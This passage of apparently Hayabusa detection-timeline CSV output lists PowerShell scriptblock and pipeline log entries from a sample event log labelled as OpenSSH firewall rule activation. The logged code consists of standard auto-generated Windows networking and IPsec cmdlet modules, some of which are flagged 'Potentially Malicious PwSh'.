$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 
'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.333 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.381 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.387 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or 
Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 